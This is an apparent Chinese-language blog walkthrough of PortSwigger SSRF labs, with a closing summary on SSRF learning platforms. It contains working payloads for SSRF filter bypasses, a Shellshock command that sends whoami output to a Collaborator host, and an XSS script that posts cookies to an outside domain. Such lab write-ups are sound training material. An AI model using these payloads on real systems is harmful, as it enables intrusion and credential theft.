PortsWigger-SSRF

Lab: Basic SSRF against the local server

任务:

删除用户carlos 

在商品详情里可以看到:

 

 抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

 接下来我们根据提示

 

知道目标用户的url了

我们重复第一步

http://localhost/admin/delete?username=carlos

Lab: Basic SSRF against another back-end system

任务:

删除用户carlos

在商品详情里可以看到: 

 

 

url解码

http%3A%2F%2F192.168.0.1%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1

根据提示我们开始爆破子网ip 

发现192.168.0.92

找到目标用户url地址

payload:

http://192.168.0.92:8080/admin/delete?username=carlos

完成

 

Lab: Blind SSRF with out-of-band detection

任务:

访问商品

抓包

发送至Repeater

启动Burp Collaborator客户端

点击"Copy to clipboard",并使Burp Collaborator客户端窗口保持打开状态。

更改Referer标头,将复制的Burp Collaborator域代替原始域 

然后我们返回到Burp Collaborator客户端窗口,然后单击“Poll now”。如果没有任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。

完成

Lab: SSRF with blacklist-based input filter

任务:

在商品详情里可以看到:

 

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

接下来我们根据提示开始尝试

综上所述,127.0.0.1被禁用了,但是127.1可以绕过

接下来我们访问admin

发现admin也被禁用了

这里可以使用双url编码绕过

a的url编码是%61

所以双url编码为%2561

绕过成功 

 

获得目标用户url地址

payload:

http://127.1/%2561dmin/delete?username=carlos

 

完成

Lab: SSRF with filter bypass via open redirection vulnerability

任务:

在商品详情里可以找到:

抓包

url解码

%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
/product/stock/check?productId=1&storeId=1

 根据提示点击next product

发现path传参

接下来根据任务

 获得目标用户的url地址

payload:

/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

完成 

 Lab: Blind SSRF with Shellshock exploitation

任务:

这里需要安装拓展插件Collaborator Everywhere

接下来就是将实验室域添加到Burp Suite的目标范围,以便Collaborator Everywhere将其作为目标。

接下来当我们浏览网站时,就会扫描出存在ssrf的漏洞

分别是User-Agent和Referer

根据提示

() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN

 

复制橙色内容 

 

 完成

Lab: SSRF with whitelist-based input filter 

任务:

在商品详情里可以发现:

抓包

url解码

http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1
url解码
http://stock.weliketoshop.net:8080/product/stock/check?productId=1&storeId=1

将stockApi参数中的URL更改为

http://127.0.0.1/

 

说明127.0.0.1被禁用了

接下来我们将URL更改为 

http://username@stock.weliketoshop.net/

然后在username后添加一个#

我们可以使用上面使用过的方法,将#双url编码%2523

将username改为localhost,并加上admin

 获得目标用户的url地址

payload:

http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos

完成

 

### 关于 SSRF 漏洞练习的靶场和学习资料 #### 官方推荐的 Web 安全漏洞测试平台 对于 SSRFServer-Side Request Forgery)漏洞的学习,可以尝试使用 Pikachu 平台进行实践操作。这是一个由官方提供的、专注于 Web 安全漏洞测试的开源项目[^1]。 #### 实际案例中的 Payload 设计 在实际环境中,SSRF 的利用通常涉及绕过输入过滤器来访问内部服务或接口。例如,在某实验场景下,可以通过构造如下 payload 来实现对目标系统的 SSRF 攻击: ```plaintext stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos ``` 此 payload 利用了 URL 编码技巧 `%2523` 替代 `#` 字符,从而成功绕过了基于白名单的输入过滤机制[^2]。 #### CSRF 和 XSS 结合的应用场景分析 除了 SSRF 外,CSRF(跨站请求伪造)也是常见的攻击手段之一。通过获取目标网站生成的 CSRF 令牌并诱导用户点击恶意链接,攻击者能够执行未经授权的操作[^3]。而在某些情况下,为了进一步提升攻击效果,还可以结合存储型 XSS 功能完成更复杂的攻击链路设计。比如以下脚本可用于窃取用户的 Cookie 数据: ```javascript <script>document.location='//xxxxxxxxxxxxxxxx.web-security-academy.net/'+document.cookie</script> ``` 该代码片段展示了如何利用 XSS 注入技术捕获受害者的敏感信息,并将其发送至攻击者控制的服务端地址上[^4]。 #### 推荐的学习资源与在线实验室 针对希望深入研究 SSRF 及其他网络安全领域知识的人群来说,可以从以下几个方面入手查找合适的教育材料或者模拟环境来进行训练: - **Pikachu**: 如前所述,它是一个综合性的渗透测试演练工具集,涵盖了多种类型的常见漏洞类型。 - **PortSwigger Web Security Academy**: 提供了一系列高质量的教学课程以及互动式的虚拟机实例用于实操体验各种网络威胁防护措施的有效性和局限性。 - **Hack The Box / TryHackMe**: 这些平台上也有专门面向初学者到高级玩家的不同难度级别的房间可供挑战,其中就包含了关于服务器端请求伪造等相关主题的内容讲解和技术分享文章。 综上所述,无论是理论基础还是动手能力培养都非常重要的前提条件下,合理选用上述提到的各种公开可用资源将会极大地促进个人技能水平的进步与发展!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值